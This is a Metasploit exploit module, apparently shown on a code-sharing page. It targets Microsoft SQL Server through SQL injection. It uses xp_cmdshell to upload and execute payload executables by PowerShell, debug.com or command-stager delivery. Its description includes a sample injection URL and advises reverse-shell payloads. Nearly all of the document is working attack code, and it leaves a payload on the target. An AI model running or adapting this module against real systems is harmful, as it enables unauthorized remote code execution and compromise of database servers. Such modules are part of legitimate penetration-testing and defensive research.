Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::MSSQL_SQLI
10
  include Msf::Exploit::CmdStager
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Microsoft SQL Server Payload Execution via SQL Injection',
15
      'Description'    => %q{
16
          This module will execute an arbitrary payload on a Microsoft SQL
17
        Server, using a SQL injection vulnerability.
18

19
        Once a vulnerability is identified this module
20
        will use xp_cmdshell to upload and execute Metasploit payloads.
21
        It is necessary to specify the exact point where the SQL injection
22
        vulnerability happens. For example, given the following injection:
23

24
        http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical
25

26
        you would need to set the following path:
27
        set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar
28

29
        In regard to the payload, unless there is a closed port in the web server,
30
        you dont want to use any "bind" payload, specially on port 80, as you will
31
        stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
32
        your port 80 or to any other outbound port allowed on the firewall.
33
        For privileged ports execute Metasploit msfconsole as root.
34

35
        Currently, three delivery methods are supported.
36

37
        First, the original method uses Windows 'debug.com'. File size restrictions are
38
        avoided by incorporating the debug bypass method presented by SecureStat at
39
        Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.
40

41
        A second method takes advantage of the Command Stager subsystem. This allows using
42
        various techniques, such as using a TFTP server, to send the executable. By default
43
        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
44

45
        Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
46
        payload on the target.
47

48
        NOTE: This module will leave a payload executable on the target system when the
49
        attack is finished.
50

51
      },
52
      'Author'         =>
53
        [
54
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
55
          'jduck',  # command stager mods
56
          'Rodrigo Marcos' # SQL injection mods
57
        ],
58
      'License'        => MSF_LICENSE,
59
      'References'     =>
60
        [
61
          # 'sa' password in logs
62
          [ 'CVE', '2000-0402' ],
63
          [ 'OSVDB', '557' ],
64
          [ 'BID', '1281' ],
65

66
          # blank default 'sa' password
67
          [ 'CVE', '2000-1209' ],
68
          [ 'OSVDB', '15757' ],
69
          [ 'BID', '4797' ],
70

71
          # code and comments
72
          [ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]
73

74
        ],
75
      'Platform'       => 'win',
76
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
77
      'Payload'        =>
78
        {
79
          'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
80
        },
81
      'Targets'        =>
82
        [
83
          [ 'Automatic', { } ],
84
        ],
85
      'CmdStagerFlavor' => 'vbs',
86
      'DefaultTarget'  => 0,
87
      'DisclosureDate' => '2000-05-30'
88
      ))
89
    register_options(
90
      [
91
        OptEnum.new('DELIVERY', [true, 'Payload delivery method', 'OLD', ['PS', 'CMD', 'OLD']])
92
      ])
93
  end
94

95
  # This is method required for the CmdStager to work...
96
  def execute_command(cmd, opts)
97
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])
98
  end
99

100
  def exploit
101

102
    method = datastore['DELIVERY'].downcase
103

104
    if (method =~ /^cmd/)
105
      execute_cmdstager({ :linemax => 1500, :nodelete => true })
106
      #execute_cmdstager({ :linemax => 1500 })
107
    else
108
      # Generate the EXE, this is the same no matter what delivery mechanism we use
109
      exe = generate_payload_exe
110

111
      # Use powershell method for payload delivery if specified
112
      if (method =~ /^ps/) or (method =~ /^power/)
113
        powershell_upload_exec(exe)
114
      else
115
        # Otherwise, fall back to the old way..
116
        mssql_upload_exec(exe, datastore['VERBOSE'])
117
      end
118
    end
119
    print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
120
    select(nil,nil,nil,50)
121
    handler
122
    disconnect
123
  end
124

125

126
end
127

128